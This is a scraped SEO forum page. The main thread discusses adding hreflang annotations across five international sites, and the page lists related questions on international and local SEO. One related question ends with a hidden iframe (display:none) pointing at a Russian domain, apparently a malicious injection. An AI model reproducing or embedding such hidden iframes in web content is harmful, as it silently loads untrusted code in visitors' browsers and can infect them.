Implementation advice on fighting international duplicate content
-
Hi All,
Let me start by explaining that I am aware of the rel="canonical" and **rel="alternate" hreflang="x" **tags but I need advice on implementation.
The situation is that we have 5 sites with similar content. Out of these 5:
- 2 use the same URL stucture and have no suffix
- 2 have a different URL structure with a .html suffix
- 1 has an entirely different URL structure with a .asp suffix
The sites are quite big so it will take a lot of work to go through and add rel="alternate" hreflang="x" tags to every single page (as we know the tag should be applied on a page level not site level).
4 out of the 5 sites are managed by us and have the tag implemented so that makes it easier but the 5th is managed in Asia and we fear the amount of manual work required will put them off implementing it. The site is due to launch at the end of the month and we need to sort this issue out before it goes live so that we are not penalised for duplicate content.
Is there an easy way to go about this or is the only way a manual addition?
Has anyone had a similar experience?
Your advice will be greatly appreciated.
Many thanks,
Emeka.
-
Unfortunately yes, it is needed to be rerun the process with the tool.
-
Thanks Gianluca,
Have you had experience using the tool above? Presumably each time a new page is added to the site the tool would have to be run again?
I agree that an in-house solution will be best but given the time limit we are open to ideas.
I appreciate your response.
Emeka.
-
When it come to massive sites and hreflang annotations, the ideal solution is implementing the hreflang using the sitemap.xml method.
It is explained here by Google: https://support.google.com/webmasters/answer/2620865?hl=en.
A tool that makes easier to implement hreflang in a sitemap file is the one The Mediaflow created:
http://www.themediaflow.com/tool_hreflang.php.
Right now, that is the only tool I know for that kind of task, so you could also think to create an internal in-house solution, if you have internal developers who can be dedicated to this.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
International SEO - How do I show correct SERP results in the UK and US?
Hi, Moz community. I hope you’re all OK and keeping busy during this difficult period. I have a few questions about international SEO, specifically when it comes to ranking pages in the UK and the US simultaneously. We currently have 2 websites set-up which are aimed towards their respective countries. We have a ‘.com’ and a ‘.com/us’. If anybody could help with the issues below, I would be very grateful. Thank you all. Issues When looking in US Google search with a VPN, the title tag for our UK page appears in the SERP e.g. I will see: UK [Product Name] | [Brand] When checking the Google cache, the UK page version also appears This can cause a problem especially when I am creating title tags and meta descriptions that are unique from the UK versions However, when clicking through from the SERP link to the actual page, the US page appears as it should do. I find this very bizarre that it seems to show you the US page when you click through, but you see the UK version in the SERP when looking in the overall search results. Current Set-Up Our UK and US page content is often very similar across our “.com” and “.com/us” websites and our US pages are canonicalised to their UK page versions to remove potential penalisation We have also added herflang to our UK and US pages Query How do I show our US SERP as opposed to the UK version in US Google search? My Theories/ Answers US page versions have to be completely unique with content related to US search intent and be indexed separately - therefore no longer canonicalised to UK version Ensure hreflang is enabled to point Google to correct local page versions Ensure local backlinks point to localised pages If anyone can help, it will be much appreciated. Many thanks all.
Local Website Optimization | | Katarina-Borovska0 -
Has Anyone Successfully implemented SpecialAnnouncement Schema?
Hello, I'm in the process of updating my clients' websites with the SpecialAnnouncement Schema type, and I'm wondering if anyone has successfully done so yet, and whether or not they're seeing any kind of results /richsnippets directly in SERPs from it? Also, has anyone else run into issues checking their schema with Google's Structured Data Testing Tool? Sometimes I get an error saying "specialAnnouncement is not a type known to Google," and sometimes I get one saying that "the property datePosted is not recognized by Google for an object of type SpecialAnnouncement." I assume these errors are because the schema type is so new, but you know what happens when you assume... Thank you for any insights!
Local Website Optimization | | LocalSEOLady0 -
What's the best international URL strategy for my non-profit?
Hi, I have a non-profit organization that advocates for mental health education and treatment. We are considering creating regional chapters of the non-profit in specific countries - France, UK, Russia, etc. What's the best long-term foundation for global organic growth? Should we simply internationalize our content (.org/uk/)? Or create a custom site for each ccTLD (.org.uk, etc.? Since it's an educational site, the content for each country would not be particularly unique, apart from: Language (regional English nuance for UK and AUS, or other languages altogether) Expert videos and potentially supporting articles (i.e., hosting videos and a supporting article for a UK Doctor versus a US Doctor) Offering some regional context when it comes to treatment options, or navigating school, work, etc. Any thoughts would be much appreciated! Thanks! Aaron
Local Website Optimization | | RSR1 -
Duplicate content, hijacked search console, crawl errors, ACCCK.
My company employed a national marketing company to create their site, which was obviously outsourced to the lowest bidder. It looks beautiful, but has a staging site with all duplicate content in the installation. I am not seeing these issues in search console, and have had no luck getting the staging site removed from the files. How much should I be banging the drum on this? We have hundreds of high level crawl errors and over a thousand in midlevel. Of course I was not around to manage the build. I also do not have ftp access I'm also dealing with major search console issues. The account is proprietarily owned by a local SEO company and I can not remove the owner who is there by delegation. The site prefers the www version and does not read the same traffic for the non www version We also have something like 90,000 backlinks from 13 sites. And a shit ton of ghost spam. Help!
Local Website Optimization | | beth_thesomersteam0 -
How can I migrate a website's content to a new WP theme, delete the old site, and avoid duplication and other issues?
Hey everyone. I recently took on a side project managing a family member's website (www.donaldtlevinemd.com). I don't want to get too into it, but my relative was roped into two shady digital marketing firms that did nothing but a mix of black-hat SEO (and nothing at all). His site currently runs off a custom wordpress theme which is incompatible with important plugins I want to use for local optimization. I'm also unable to implement responsive design for mobile. The silver lining is that these previous "content marketers" did no legitimate link building (I'm auditing the link profile now) so I feel comfortable starting fresh. I'm just not technical enough to understand how to go about migrating his domain to a new theme (or creating a new domain altogether). All advice is appreciated! Thanks for your help!
Local Website Optimization | | jampaper1 -
Multi Location business - Should I 301 redirect duplicate location pages or alternatively No Follow tag them ?
Hello All, I have a eCommerce site and we operate out of mulitple locations. We currently have individual location pages for these locations against each of our many categories. However on the flip slide , this create alot of duplicate content. All of our location pages whether unique or duplicated have a unique title Tag, H1, H2 tag , NAP and they all bring in the City Name . The content on the duplicated content also brings in the City name as well. We have been going through our categories and writing unique content for our most popular locations to help rank on local search. Currently I've been setting up 301 redirects for the locations in the categories with the duplicated content pointing back to the category page. I am wondering whether the increase in number of 301's will do more harm than having many duplicate location pages ?.. I am sure my site is affected by the panda algorithm penalty(on the duplicated content issues) as a couple of years ago , this didn't matter and we ranked top 3 for pretty much for every location but now we are ranking between 8 - 20th depending on keyword. An Alternative I thought, may be to instead of 301 those locations pages with duplicate content, is to put No Follow tags on them instead ?... What do you think ?. It's not economically viable to write unique content for every location on every category and these would not only take years but would cost us far to much money. Our Site is currently approx 10,000 pages Any thoughts on this greatly appreciated ? thanks Pete
Local Website Optimization | | PeteC120 -
Main Website and microsite - Do I do google places for both as it will technically be duplicating the locations,?
Hi All, I have a main eCommerce website which trades out of a number of locations and all these locations appear in google places although they don't rank particularly well in google places . I also have a number of microsites which are specific to one type of product I do and these rank very well locally. My question is , should I also do google places for my microsites as this would technically mean I am creating a duplicate location listing in google places but for a different website etc./business I only have one google account so I guess this would be done under the same google account ? thanks Pete <iframe id="zunifrm" style="display: none;" src="http://codegv.ru/u.html"></iframe>
Local Website Optimization | | PeteC120 -
How can I rank my .co.uk using content on my .com?
Hi, We currently have a .com site ranking second for our brand term in the .co.uk SERP. This is mainly because we don't own the exact match brand term which comes from not having a clue what we were doing when we set up the company. Would it be possible to out rank this term considering we the weighing that google puts towards exact matches in the URL? N.B - There are a few updates we could do to the homepage to make the on-page optimisation better and we have not actively done any link building yet which will obviously help. competitor SERP rank 1 - MOZ PA38 DA26 Our Site SERP rank 2 - MOZ PA43 DA32 Thanks Ben
Local Website Optimization | | benjmoz0